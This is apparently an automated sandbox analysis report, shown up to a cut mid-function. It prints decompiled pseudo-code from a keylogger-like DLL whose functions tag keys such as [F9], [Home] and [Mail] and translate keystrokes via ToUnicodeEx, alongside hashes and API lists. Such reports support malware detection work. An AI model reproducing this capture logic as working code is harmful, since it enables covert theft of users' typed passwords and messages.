Opcode Fuzzy Hash: 269bc51cce26e08b7987e5e807f60e6eca6bbb1954024bbcceed0e0ae58e0d67
Instruction Fuzzy Hash: 6031C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECAB8EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000751F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000751F(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F9]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x1000751f
0x1000751f
0x10007526
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
[F9], xrefs: 10007521
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F9]
API String ID: 783433895-4008460491
Opcode ID: 444f65efb271440691118d92cbb22e99e4c9ae094b7b34bc2ed2fe1424e09415
Instruction ID: 38b91922dc69364cef5aea0e1c7caf2c8941d83122a4e84074c5e0a9e1d120e7
Opcode Fuzzy Hash: 444f65efb271440691118d92cbb22e99e4c9ae094b7b34bc2ed2fe1424e09415
Instruction Fuzzy Hash: 7931C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007530, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007530(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Help]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007530
0x10007530
0x10007537
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Help], xrefs: 10007532

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Help]
API String ID: 783433895-1051485797
Opcode ID: ced4cd071d1595dfe819caa796369f839c5973703fb59967c5cdb73c5bd85563
Instruction ID: f0b57f7016c57c8c20a1b9935e52d223e1421e2fc95fd17f59aa325daa1d6166
Opcode Fuzzy Hash: ced4cd071d1595dfe819caa796369f839c5973703fb59967c5cdb73c5bd85563
Instruction Fuzzy Hash: 6531C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007541, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007541(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Home]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007541
0x10007541
0x10007548
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Home], xrefs: 10007543

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Home]
API String ID: 783433895-1734740514
Opcode ID: 9ec5ab9d4604e29abd3d62d3fd543d6ce600cb0c2aac55af5353df70f8432c9f
Instruction ID: 9b7988cd9c8808cb16b3aff513ce4990ca071120e42acbfc5b27312343c6384a
Opcode Fuzzy Hash: 9ec5ab9d4604e29abd3d62d3fd543d6ce600cb0c2aac55af5353df70f8432c9f
Instruction Fuzzy Hash: 5431B0B8B042545BF722C7658C45B9F73A9FB882C0F50C0A5B5489720ECA78EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 10007552, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007552(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Insert]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007552
0x10007552
0x10007559
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Insert], xrefs: 10007554

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Insert]
API String ID: 783433895-3655187251
Opcode ID: 9d60750e0895b90f1793ccffef72419a008b73ac973bbf6264f6d5eda5d9540b
Instruction ID: 57a58e9cbdcce06a745c8a6e1d46379205d73043c2f41df68cb32627f3cbbbdd
Opcode Fuzzy Hash: 9d60750e0895b90f1793ccffef72419a008b73ac973bbf6264f6d5eda5d9540b
Instruction Fuzzy Hash: 4831BEB8F042545BF722CB658C45B9F73A9FB882C0F50C0A6B5489720ECA78EE458B61

Uniqueness

Uniqueness Score: -1.00%

Function 10007563, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007563(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Mail]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007563
0x10007563
0x1000756a
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Mail], xrefs: 10007565

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Mail]
API String ID: 783433895-2576540148
Opcode ID: 894362c06f24928aebacecf1c1ea633ebd1172f8d8f33313dcf1344a25e01b1e
Instruction ID: fbc98f99418ed78a52aeb1d89c1fb141902b9a4107213f6ffe6694a7e55c15de
Opcode Fuzzy Hash: 894362c06f24928aebacecf1c1ea633ebd1172f8d8f33313dcf1344a25e01b1e
Instruction Fuzzy Hash: BC31C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761

Uniqueness

Uniqueness Score: -1.00%

Function 10007574, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007574(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Media]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
